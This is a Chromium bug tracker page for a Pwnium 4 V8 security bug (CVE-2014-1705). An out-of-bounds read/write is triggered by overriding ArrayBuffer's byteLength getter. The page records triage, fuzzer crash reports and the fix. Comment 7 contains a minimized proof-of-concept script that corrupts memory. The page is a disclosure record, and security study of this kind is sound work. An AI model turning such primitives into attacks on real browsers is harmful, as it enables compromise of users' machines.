Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 351787
Starred by 7 users
Status: Fixed
Owner:
danno@chromium.org
Closed: Mar 2014
Cc:
mbevand@google.com
jkummerow@chromium.org
yangguo@chromium.org
kamakshi@chromium.org
br...@gorenc.net
haraken@chromium.org
deepakg@chromium.org
dslomov@chromium.org
mstarzinger@chromium.org
olofj@chromium.org
marja@chromium.org
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: ----
Type: Bug-Security

Blocking:
issue 351788
issue 352420



Sign in to add a comment
 Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength
Project Member Reported by infe...@chromium.org, Mar 12 2014 Back to list 
v8 OOB bug
Comment 1 by infe...@chromium.org, Mar 12 2014
simple32.js
6.9 KB View Download
Comment 2 by jorgelo@chromium.org, Mar 12 2014
Blocking: chromium:351788
Comment 3 by infe...@chromium.org, Mar 12 2014
Labels: -Restrict-View-SecurityEmbargo
Comment 4 by jochen@chromium.org, Mar 12 2014
Cc: dslomov@chromium.org
Comment 5 by parisa@chromium.org, Mar 12 2014
Cc: olofj@chromium.org
Comment 6 by infe...@chromium.org, Mar 12 2014
Labels: Security_Impact-Beta Security_Impact-Stable Security_Severity-High
Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: Pwnium: v8 OOB )
Project Member Comment 7 by clusterf...@chromium.org, Mar 12 2014
Summary: UNKNOWN in v8::internal::Invoke (was: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048

Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp

Crash Type: UNKNOWN
Crash Address: 0x609000150000
Crash State:
  - crash stack -
  v8::internal::Invoke
  v8::Script::Run
  WebCore::V8ScriptRunner::runCompiledScript
  

Minimized Testcase (0.21 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A
<script>
var ab = new ArrayBuffer(8);
  ab.__defineGetter__("byteLength", function() { return 0xFFFFFFFC; });
  var aaa = new Uint32Array(ab);

      for (var i = 0; i < 0x8000; i+=1) {
      aaa[i] = 1;
    }
</script>
Comment 8 by infe...@chromium.org, Mar 12 2014
Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: UNKNOWN in v8::internal::Invoke)
Comment 9 by danno@chromium.org, Mar 12 2014
Cc: jkummerow@chromium.org
(summarizing for the V8 team): The V8 fix is for all trusted usages of properties on ArrayBuffers and other TypedArray variants to use un-patchable intrinsics rather then a property access.

Jakob has a patch that fixes this specific problem, but we're auditing the rest of the TypedArray code for similar problems.
Comment 10 by danno@chromium.org, Mar 12 2014
Cc: marja@chromium.org yangguo@chromium.org
Comment 11 by jkummerow@chromium.org, Mar 12 2014
Status: Fixed
Fixed in V8 bleeding_edge: https://code.google.com/p/v8/source/detail?r=19862.

Merged to M33 as V8 3.23.17.23.
Merged to M34 as V8 3.24.35.15.
Comment 12 by infe...@chromium.org, Mar 12 2014
Labels: Release-3-M33
Project Member Comment 13 by clusterf...@chromium.org, Mar 12 2014
Summary: UNKNOWN in WebCore::Document::popCurrentScript (was: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048

Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp

Crash Type: UNKNOWN
Crash Address: 0x00009fff8002
Crash State:
  - crash stack -
  WebCore::Document::popCurrentScript
  WebCore::ScriptLoader::executeScript
  WebCore::ScriptLoader::prepareScript
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A
Comment 14 by infe...@chromium.org, Mar 12 2014
Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: UNKNOWN in WebCore::Document::popCurrentScript)
Comment 15 by jorgelo@chromium.org, Mar 13 2014
Cc: deepakg@chromium.org
Comment 16 by eseidel@chromium.org, Mar 13 2014
Cc: haraken@chromium.org
Project Member Comment 17 by clusterf...@chromium.org, Mar 13 2014
Summary: Heap-buffer-overflow in v8::internal::Runtime_ArrayBufferSliceImpl (was: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5905159708213248

Fuzzer: Mbarbella_js_mutation
Job Type: Linux_asan_d8_v8_arm

Crash Type: Heap-buffer-overflow READ 100000
Crash Address: 0xf5fcb3e0
Crash State:
  - crash stack -
  v8::internal::Runtime_ArrayBufferSliceImpl
  v8::internal::Simulator::SoftwareInterrupt
  v8::internal::Simulator::InstructionDecode
  

Minimized Testcase (3.50 Kb): https://cluster-fuzz.appspot.com/download/AMIfv940PeGBCMH8eFQpTfxqfeTehbbuuHbU-SfxhHHAB-1DJ3LMEoVU1tY-IFHG4LPXxpip_hohSuIJTEYFxY-XVlWwaiFfPY3-sBT7lazDV-TSiYP07VsE6MJSXYhFrp2z8Qe6XVSJq6H22maA1cyBdkPG2rzyng
Comment 18 by infe...@chromium.org, Mar 13 2014
Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: Heap-buffer-overflow in v8::internal::Runtime_ArrayBufferSliceImpl)
We get much better stacks from arm build, logged in above just for reference.
Comment 19 by tsepez@chromium.org, Mar 13 2014
Blocking: chromium:352420
Comment 20 by keescook@chromium.org, Mar 13 2014
Labels: CVE-2014-1705
Comment 21 by scarybea...@gmail.com, Mar 14 2014
Labels: ZDI-CAN-2235
Comment 22 by scarybea...@gmail.com, Mar 14 2014
Labels: -ZDI-CAN-2235 ZDI-CAN-2233
Comment 23 by scarybea...@gmail.com, Mar 14 2014
Cc: br...@gorenc.net
Project Member Comment 24 by clusterf...@chromium.org, Mar 14 2014
Summary: UNKNOWN in WebCore::Document::popCurrentScript (was: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048

Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp

Crash Type: UNKNOWN
Crash Address: 0x00009fff8002
Crash State:
  - crash stack -
  WebCore::Document::popCurrentScript
  WebCore::ScriptLoader::executeScript
  WebCore::ScriptLoader::prepareScript
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A
Comment 25 by infe...@chromium.org, Mar 14 2014
Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: UNKNOWN in WebCore::Document::popCurrentScript)
Comment 26 by k...@google.com, Mar 14 2014
Cc: kamakshi@chromium.org
Project Member Comment 27 by clusterf...@chromium.org, Mar 14 2014 
ClusterFuzz has detected this issue as fixed in range 256789:256846.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048

Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp

Crash Type: UNKNOWN
Crash Address: 0x00009fff8002
Crash State:
  - crash stack -
  WebCore::Document::popCurrentScript
  WebCore::ScriptLoader::executeScript
  WebCore::ScriptLoader::prepareScript
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464
Fixed: https://cluster-fuzz.appspot.com/revisions?range=256789:256846

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Project Member Comment 28 by clusterf...@chromium.org, Mar 14 2014 
ClusterFuzz has detected this issue as fixed in range 256789:256846.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5905159708213248

Fuzzer: Mbarbella_js_mutation
Job Type: Linux_asan_d8_v8_arm

Crash Type: Heap-buffer-overflow READ 100000
Crash Address: 0xf5fcb3e0
Crash State:
  - crash stack -
  v8::internal::Runtime_ArrayBufferSliceImpl
  v8::internal::Simulator::SoftwareInterrupt
  v8::internal::Simulator::InstructionDecode
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=256789:256846

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv940PeGBCMH8eFQpTfxqfeTehbbuuHbU-SfxhHHAB-1DJ3LMEoVU1tY-IFHG4LPXxpip_hohSuIJTEYFxY-XVlWwaiFfPY3-sBT7lazDV-TSiYP07VsE6MJSXYhFrp2z8Qe6XVSJq6H22maA1cyBdkPG2rzyng

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Comment 29 by sirdarck...@gmail.com, Mar 27 2014
Cc: mbevand@google.com
Project Member Comment 30 by clusterf...@chromium.org, Jun 18 2014
Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.
Project Member Comment 31 by clusterf...@chromium.org, Feb 2 2016
Labels: -Security_Impact-Beta
Project Member Comment 32 by sheriffbot@chromium.org, Oct 1 2016 
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 33 by sheriffbot@chromium.org, Oct 2 2016 
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 34 by sheriffbot@chromium.org, Oct 2 2016
Labels: Restrict-View-SecurityNotify
Comment 35 by mbarbe...@chromium.org, Oct 2 2016
Labels: allpublic
Project Member Comment 36 by sheriffbot@chromium.org, Oct 3 2016
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Sign in to add a comment